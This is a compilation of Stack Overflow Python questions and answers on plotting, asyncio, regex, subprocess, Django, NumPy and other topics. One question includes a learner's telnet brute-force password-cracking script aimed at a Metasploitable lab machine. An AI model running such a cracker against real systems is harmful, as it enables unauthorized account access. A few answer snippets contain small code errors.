here](http://i.stack.imgur.com/yNrA8.png)](http://i.stack.imgur.com/yNrA8.png)
Answer: It's because `TIMESTAMP` is not your index, from the `sns.heatmap` docstring:
> yticklabels : list-like, int, or bool, optional If True, plot the row names
> of the dataframe. If False, don't plot the row names. If list-like, plot
> these alternate labels as the yticklabels. If an integer, use the index
> names but plot only every n label.
The row names being the index.
So you can just set your index accordingly:
df1.set_index("TIMESTAMP", inplace=1)
and with your `sns` command, it will work almost fine. To problem is that
you'll have an ugly representation of the date.
Alternatively, you can do, **instead of changing the index** :
import matplotlib.pyplot as plt
import seaborn as sns
import pandas as pd
...
...
ax = sns.heatmap(df1.iloc[:, 1:6:], annot=True, linewidths=.5)
ax.set_yticklabels([i.strftime("%Y-%m-%d %H:%M:%S") for i in df1.TIMESTAMP], rotation=0)
HTH
|
Monitoring the asyncio event loop
Question: I am writing an application using python3 and am trying out asyncio for the
first time. One issue I have encountered is that some of my coroutines block
the event loop for longer than I like. I am trying to find something along the
lines of top for the event loop that will show how much wall/cpu time is being
spent running each of my coroutines. If there isn't anything already existing
does anyone know of a way to add hooks to the event loop so that I can take
measurements?
I have tried using cProfile which gives some helpful output, but I am more
interested in time spent blocking the event loop, rather than total execution
time.
Answer: Event loop can already track if coroutines take much CPU time to execute. To
see it you should [enable debug
mode](https://docs.python.org/3/library/asyncio-
eventloop.html#asyncio.AbstractEventLoop.set_debug) with `set_debug` method:
import asyncio
import time
async def main():
time.sleep(1) # Block event loop
if __name__ == "__main__":
loop = asyncio.get_event_loop()
loop.set_debug(True) # Enable debug
loop.run_until_complete(main())
In output you'll see:
Executing <Task finished coro=<main() [...]> took 1.016 seconds
By default it shows warnings for coroutines that blocks for more than 0.1 sec.
It's not documented, but based on asyncio [source
code](https://github.com/python/asyncio/blob/master/asyncio/base_events.py#L240),
looks like you can change `slow_callback_duration` attribute to modify this
value.
|
Make a list of every column in a file in Python
Question: I would like to create a list for every column in a txt file. The file looks
like this:
`NAME S1 S2 S3 S4 A 1 4 3 1 B 2 1 2 6 C 2 1 3 5`
PROBLEM 1 . How do I dynamically make the number of lists that fit the number
of columns, such that I can fill them? In some files I will have 4 columns,
others I will have 6 or 8...
PROBLEM 2. What is a pythonic way to iterate through each column and make a
list of the values like this:
list_s1 = [1,2,2]
list_s2 = [4,1,1]
etc.
Right now I have read in the txt file and I have each individual line. As
input I give the number of NAMES in a file (here HOW_MANY_SAMPLES = 4)
def parse_textFile(file):
list_names = []
with open(file) as f:
header = f.next()
head_list = header.rstrip("\r\n").split("\t")
for i in f:
e = i.rstrip("\r\n").split("\t")
list_names.append(e)
for i in range(1, HOW_MANY_SAMPLES):
l+i = []
l+i.append([a[i] for a in list_names])
I need a dynamic way of creating and filling the number of lists that
correspond to the amount of columns in my table.
Answer: ## Problem 1:
You can use `len(head_list)` instead of having to specify `HOW_MANY_SAMPLES`.
You can also try using [Python's CSV
module](https://docs.python.org/3/library/csv.html) and setting the delimiter
to a space or a tab instead of a comma.
See [this answer to a similar StackOverflow
question](http://stackoverflow.com/a/8859304/3199915).
## Problem 2:
Once you have a list representing each row, you can use `zip` to create lists
representing each column: See [this
answer](http://stackoverflow.com/a/20279160/3199915).
With the CSV module, you can [follow this
suggestion](http://stackoverflow.com/a/29082892/3199915), which is another way
to invert the data from row-based lists to column-based lists.
## Sample:
import csv
# open the file in universal line ending mode
with open('data.txt', 'rU') as infile:
# register a dialect that skips extra whitespace
csv.register_dialect('ignorespaces', delimiter=' ', skipinitialspace=True)
# read the file as a dictionary for each row ({header : value})
reader = csv.DictReader(infile, dialect='ignorespaces')
data = {}
for row in reader:
for header, value in row.items():
try:
if (header):
data[header].append(value)
except KeyError:
data[header] = [value]
for column in data.keys():
print (column + ": " + str(data[column]))
this yields:
S2: ['4', '1', '1']
S1: ['1', '2', '2']
S3: ['3', '2', '3']
S4: ['1', '6', '5']
NAME: ['A', 'B', 'C']
|
How to use subprocess to interact with a python script
Question: I'm writing an IDE for python, in python, and need to use subprocess to
intereact with a user's script.
I am completely new to using subprocess and not sure what I'm doing here. I've
created a test snippet representing what I'm trying to do:
from subprocess import Popen,PIPE,STDOUT
import tkinter as tk
t=tk.Text()
t.pack()
p = Popen(["python","c:/runme.py"],stdout=PIPE,stdin=PIPE,stderr=PIPE,shell=True)
p.stdin.write("5".encode())
out=p.stdout.read()
t.insert(1.0,out)
And here is the test script I'm trying to interact with:
print("Hello World")
inp=input("Enter a Number: ")
print(inp)
quit()
Unfortunately it just waiting (presumably) on line 2. How do I read what has
already been printed and how to I then input the string?
Answer: You have to flush stdout regularly, because, if the script is not connected to
a terminal, the output is not automatically flushed:
import sys
print("Hello World")
print("Enter a Number: ")
stdout.flush()
inp = input()
print(inp)
and you have to terminate the input by return `\n`:
p = Popen(["python", "c:/runme.py"], stdout=PIPE, stdin=PIPE, stderr=PIPE)
p.stdin.write("5\n".encode())
out = p.stdout.read()
|
Regular expressions in python to match Twitter handles
Question: I'm trying to use regular expressions to capture all Twitter handles within a
tweet body. The challenge is that I'm trying to get handles that
1. Contain a specific string
2. Are of unknown length
3. May be followed by either
* punctuation
* whitespace
* or the end of string.
For example, for each of these strings, Ive marked _in italics_ what I'd like
to return.
> "@handle what is your problem?" _[RETURN '@handle']_
>
> "what is your problem @handle?" _[RETURN '@handle']_
>
> "@123handle what is your problem @handle123?" _[RETURN '@123handle',
> '@handle123']_
This is what I have so far:
>>> import re
>>> re.findall(r'(@.*handle.*?)\W','hi @123handle, hello @handle123')
['@123handle']
# This misses the handles that are followed by end-of-string
I tried modifying to include an `or` character allowing the end-of-string
character. Instead, it just returns the whole string.
>>> re.findall(r'(@.*handle.*?)(?=\W|$)','hi @123handle, hello @handle123')
['@123handle, hello @handle123']
# This looks like it is too greedy and ends up returning too much
How can I write an expression that will satisfy both conditions?
I've looked at a [couple](http://stackoverflow.com/questions/16932012/regex-
how-to-match-any-string-until-whitespace-or-until-punctuation-followed-b)
[other](http://stackoverflow.com/questions/6713310/how-to-specify-space-or-
end-of-string-and-space-or-start-of-string) places, but am still stuck.
Answer: It seems you are trying to match strings starting with `@`, then having 0+
word chars, then `handle`, and then again 0+ word chars.
Use
r'@\w*handle\w*'
or - to avoid matching `@`+word chars in emails:
r'\B@\w*handle\w*'
See the [Regex 1 demo](https://regex101.com/r/jW4xL1/1) and the [Regex 2
demo](https://regex101.com/r/jW4xL1/2) (the `\B` non-word boundary requires a
non-word char or start of string to be right before the `@`).
Note that the `.*` is a greedy dot matching pattern that matches any
characters other than newline, as many as possible. `\w*` only matches 0+
characters (also as many as possible) but from the `[a-zA-Z0-9_]` set if the
`re.UNICODE` flag is not used (and it is not used in your code).
[Python demo](http://ideone.com/T1bZx4):
import re
p = re.compile(r'@\w*handle\w*')
test_str = "@handle what is your problem?\nwhat is your problem @handle?\n@123handle what is your problem @handle123?\n"
print(p.findall(test_str))
# => ['@handle', '@handle', '@123handle', '@handle123']
|
get Json data from request with Django
Question: I'm trying to develop a very simple script in Django, I'd collect a Json data
from the request and then store all data in the database.
I developed one python script that I'm using to send the Json data to the
Django view, but I'm doing something wrong and I can't understand what,
because every time that I run it,I've got "Malformed data!".
Can someone helps me? what am I doing wrong?
Sender.py
import json
import urllib2
data = {
'ids': ["milan", "rome","florence"]
}
req = urllib2.Request('http://127.0.0.1:8000/value/')
req.add_header('Content-Type', 'application/json')
response = urllib2.urlopen(req, json.dumps(data))
Django view.py
from django.shortcuts import render
# Create your views here.
from django.http import HttpResponse
import json
from models import *
from django.http import StreamingHttpResponse
from django.views.decorators.csrf import csrf_exempt
@csrf_exempt
def value(request):
try:
data = json.loads(request.body)
label = data['label']
url = data ['url']
print label, url
except:
return HttpResponse("Malformed data!")
return HttpResponse("Got json data")
Answer: Your dictionary "data" in sender.py contains only one value with key "ids" but
in view.py you are trying to access keys "label" and "url" in this parsed
dictionary.
|
Using python regex to find repeated values after a header
Question: If I have a string that looks something like:
s = """
...
Random Stuff
...
HEADER
a 1
a 3
# random amount of rows
a 17
RANDOM_NEW_HEADER
a 200
a 300
...
More random stuff
...
"""
Is there a clean way to use regex (in Python) to find all instances of `a \d*`
after HEADER, but before the pattern is broken by SOMETHING_TOTALLY_DIFFERENT?
I thought about something like:
import re
pattern = r'HEADER(?:\na \d*)*\na (\d*)'
print re.findall(pattern, s)
Unfortunately, regex doesn't find overlapping matches. If there's no sensible
way to do this with regex, I'm okay with anything faster than writing my own
for loop to extract this data.
(TL;DR -- There's a distinct header, followed by a pattern that repeats. I
want to catch each instance of that pattern, as long as there isn't a break in
the repetition.)
EDIT:
To clarify, I don't necessarily know what SOMETHING_TOTALLY_DIFFERENT will be,
only that it won't match `a \d+`. I want to collect all consecutive instances
of `\na \d+` that follow `HEADER\n`.
Answer: How about a simple loop?
import re
e = re.compile(r'(a\s+\d+)')
header = 'whatever your header field is'
breaker = 'something_different'
breaker_reached = False
header_reached = False
results = []
with open('yourfile.txt') as f:
for line in f:
if line == header:
# skip processing lines unless we reach the header
header_reached = True
continue
if header_reached:
i = e.match(line)
if i and not breaker_reached:
results.append(i.groups()[0])
else:
# There was no match, check if we reached the breaker
if line == breaker:
breaker_reached = True
|
Choosing python data structures to speed up algorithm implementation
Question: So I'm given a large collection (roughly 200k) of lists. Each contains a
subset of the numbers 0 through 27. I want to return two of the lists where
the product of their lengths is greater than the product of the lengths of any
other pair of lists. There's another condition, namely that the lists have no
numbers in common.
There's an algorithm I found for this (can't remember the source, apologies
for non-specificity of props) which exploits the fact that there are fewer
total subsets of the numbers 0 through 27 than there are words in the
dictionary.
The first thing I've done is looped through all the lists, found the unique
subset of integers that comprise it and indexed it as a number between 0 and
1<<28\. As follows:
def index_lists(lists):
index_hash = {}
for raw_list in lists:
length = len(raw_list)
if length > index_hash.get(index,{}).get("length"):
index = find_index(raw_list)
index_hash[index] = {"list": raw_list, "length": length}
return index_hash
This gives me the longest list and the length of the that list for each subset
that's actually contained in the collection of lists given. Naturally, not all
subsets from 0 to (1<<28)-1 are necessarily included, since there's not
guarantee the supplied collection has a list containing each unique subset.
What I then want, for each subset 0 through 1<<28 (all of them this time) is
the longest list that contains at most that subset. This is the part that is
killing me. At a high level, it should, for each subset, first check to see if
that subset is contained in the index_hash. It should then compare the length
of that entry in the hash (if it exists there) to the lengths stored
previously in the current hash for the current subset minus one number (this
is an inner loop 27 strong). The greatest of these is stored in this new hash
for the current subset of the outer loop. The code right now looks like this:
def at_most_hash(index_hash):
most_hash = {}
for i in xrange(1<<28): # pretty sure this is a bad idea
max_entry = index_hash.get(i)
if max_entry:
max_length = max_entry["length"]
max_word = max_entry["list"]
else:
max_length = 0
max_word = []
for j in xrange(28): # again, probably not great
subset_index = i & ~(1<<j) # gets us a pre-computed subset
at_most_entry = most_hash.get(subset_index, {})
at_most_length = at_most_entry.get("length",0)
if at_most_length > max_length:
max_length = at_most_length
max_list = at_most_entry["list"]
most_hash[i] = {"length": max_length, "list": max_list}
return most_hash
This loop obviously takes several forevers to complete. I feel that I'm new
enough to python that my choice of how to iterate and what data structures to
use may have been completely disastrous. Not to mention the prospective memory
problems from attempting to fill the dictionary. Is there perhaps a better
structure or package to use as data structures? Or a better way to set up the
iteration? Or maybe I can do this more sparsely?
The next part of the algorithm just cycles through all the lists we were given
and takes the product of the subset's max_length and complementary subset's
max length by looking them up in at_most_hash, taking the max of those.
Any suggestions here? I appreciate the patience for wading through my long-
winded question and less than decent attempt at coding this up.
In theory, this is still a better approach than working with the collection of
lists alone since that approach is roughly o(200k^2) and this one is roughly
o(28*2^28 + 200k), yet my implementation is holding me back.
Answer: Given that your indexes are just ints, you could save some time and space by
using lists instead of dicts. I'd go further and bring in
[NumPy](http://www.numpy.org/) arrays. They offer compact storage
representation and efficient operations that let you implicitly perform
repetitive work in C, bypassing a ton of interpreter overhead.
Instead of `index_hash`, we start by building a NumPy array where
`index_array[i]` is the length of the longest list whose set of elements is
represented by `i`, or `0` if there is no such list:
import numpy
index_array = numpy.zeros(1<<28, dtype=int) # We could probably get away with dtype=int8.
for raw_list in lists:
i = find_index(raw_list)
index_array[i] = max(index_array[i], len(raw_list))
We then use NumPy operations to bubble up the lengths in C instead of
interpreted Python. Things might get confusing from here:
for bit_index in xrange(28):
index_array = index_array.reshape([1<<(28-bit_index), 1<<bit_index])
numpy.maximum(index_array[::2], index_array[1::2], out=index_array[1::2])
index_array = index_array.reshape([1<<28])
Each `reshape` call takes a new view of the array where data in even-numbered
rows corresponds to sets with the bit at `bit_index` clear, and data in odd-
numbered rows corresponds to sets with the bit at `bit_index` set. The
`numpy.maximum` call then performs the bubble-up operation for that bit. At
the end, each cell `index_array[i]` of `index_array` represents the length of
the longest list whose elements are a subset of set `i`.
We then compute the products of lengths at complementary indices:
products = index_array * index_array[::-1] # We'd probably have to adjust this part
# if we picked dtype=int8 earlier.
find where the best product is:
best_product_index = products.argmax()
and the longest lists whose elements are subsets of the set represented by
`best_product_index` and its complement are the lists we want.
|
How to call a function that is later in a Python script?
Question: I am currently learning Python for some penetration testing and was practicing
making password cracking scripts. While I was making a script for a telnet
pass cracker I ran into a problem with some of the functionality of it. While
trying to allow the user to output the findings, as well as some extra
information, I found my issue.
I am using getopt to take arguments for the script such as the ip, username,
and an output file (I am trying to make an option to put in a word list for
the passwords and usernames but I am still learning about using files).
Because a function has to be written above where it is called I am running
into the issue of needing the function in two places.
I need it above the getopt for loop, but I also need it in the for loop that
guesses the password. I have looked at a few possible solutions but I am
really confused by them as I am still somewhat new to Python. I do not really
know how to explain it well but the basis of what I need to do is to be able
to call the function before the function is written if anyone understands
that. Thank you for all the help in advance.
Also I know that there are most likely a lot more efficient ways to do what I
am trying, but I just wanted to mess around and see if I had the ability to do
this, no matter how unorganized the code is.
Here is my code:
import telnetlib
import re
import sys
import time
import getopt
from time import gmtime, strftime
total_time_start = time.clock()
#Get the arguments from the user
try:
opts, args = getopt.getopt(sys.argv[1:], "i:u:f:")
except getopt.GetoptError as err:
print str(err)
sys.exit(2)
passwords = ["hello","test", "msfadmin", "password"]
username = " "
ip = "0.0.0.0"
output_file = " "
for o, a in opts:
if o == "-i":
ip = a
elif o in ("-u"):
username =a
elif o in ("-f"):
output_file = a
file_out()
else:
assert False, "unhandled option"
#Connect using the password and username from the for loop later in the script.
def connect(username, password, ip):
global tn
tn = telnetlib.Telnet(ip)
print "[*] Trying " + username + " and " + password
tn.read_until("metasploitable login: ")
tn.write(username + "\n")
tn.read_until("Password: ")
tn.write(password + "\n")
#Guess the password
for password in passwords:
attempt = connect(username, password, ip)
time_start = time.clock()
if attempt == tn.read_until("msfadmin@metasploitable", timeout = 1):
pass
time_end = time.clock()
time_finish = time_end - time_start
#Determine if the password is correct or not
if time_finish > 0.001000:
print "\033[1;32;40m [*] Password '" + password + "' found for user '" + username+"'\033[0;37;40m\n"
total_time_end = time.clock()
total_time = (total_time_end - total_time_start)
#Print the findings to a file that is selected from an argument
def file_out():
date = strftime("%a, %d %b %Y %H:%M:%S +0000", gmtime())
fout = open(output_file, 'w')
fout.write("Server IP: " + ip)
fout.write("\nUsername is " + username)
fout.write("Password is " + password)
fout.write("\nCrack was conducted on " + date)
fout.write("The crack took a total time of " + total_time)
sys.exit(0)
Here is the error I am getting:
python telnet_cracker.py -i [ip of metasploitable] -u msfadmin -f test.txt
Traceback (most recent call last):
File "telnet_cracker.py", line 49, in <module>
file_out()
NameError: name 'file_out' is not defined
Answer: Move the function to the top level of the script. Don't nest it inside of an
if statement inside of a loop.
There's no need to redefine a function in a loop (and defining it in a
conditional doesn't seem good either)
> a function has to be written above where it is called
Not quite. Functions simply need to be _defined_ before the code that runs
them. The functions don't need to explicitly be "above the code" where they
are called. Same logic applies to variables.
If you need to reference certain variables for the function, then use
parameters.
|
Exiting interactive python3 session from script
Question: I'd like my program to automatically exit if it detects an error when loading
a file and parsing it (even when called from an interactive mode with -i).
I've tried variations of `exit()` and `sys.exit()`, but nothing seems to be
working. Instead of exiting the interactive session I get a stack trace. For
example, if I have the file `test.py` that is the following:
import sys
sys.exit(0)
when I run `python3 -i test.py` I get the following result:
Traceback (most recent call last):
File "test.py", line 2, in <module>
sys.exit()
SystemExit
>>>
and the session continues on, until I exit myself (using those exact lines
subsequently work, just not when they're called from the script). What am I
missing?
Answer: Try calling [os._exit()](https://docs.python.org/2/library/os.html#os._exit)
to exit directly, without throwing an exception
import os
os._exit(1)
Note that this will bypass all of the python shutdown logic. Hope it helps.
|
Or statements for complex regex formation in python
Question: I need to formulate a regex to pick up only the first part of a particular
string rather than the second part. For example:
(part1) (Part2)
SAI Table
Cloth
DARA
I want to extract only `SAI` (i.e. part1 and not part2). Notice that the 2nd
line is empty in part 1 and hence it should return an empty space (and not
`cloth`). The same regex must work for all three cases of strings. In the case
of string2 part one must return a blank space and not `table`. There is no
certain length of spaces between the two parts. It varies.
This is the regex I tried, but it only works for string1 and string3:
[\s]{1,}((?:[a-zA-Z)(@\-,."'',&*]+[\s]?)+)[\s]{2,}
Is there any way to write a regex that would work in this case?
I can only use regex here as I need it to return any string present there. The
string can be alpha-numerals and may contain the most popularly used symbols
present in my earlier regex. The space between the two is never fixed.
I also need it to return a space where it is empty in part 1. We can ignore
part 2. But I have to make sure that the regex does not match part 2.
Answer: If the first column (_part1_) is **always** followed by 2 spaces, whereas the
second (_part2_) is not, you can rely on that condition to prevent a match in
the last column. We can use the [lookahead](http://www.regular-
expressions.info/lookaround.html) `(?=[\t ]{2})` to assert for 2 consecutive
spaces or tabs.
**Code**
import re
patt = r'^[\t ]*(\S+(?:[\t ]\S+)*(?=[\t ]{2})| )'
str = r'''
(part1) (Part2)
SAI Table
Cloth
DARA
'''
print re.findall(patt, str, re.MULTILINE)
**Output**
['(part1)', 'SAI', ' ', 'DARA']
`[ideone demo](http://ideone.com/lqvLXX)`
You may as well change `\S` to `[a-zA-Z)(@\-,."'',&*]` to limit the allowed
characters.
|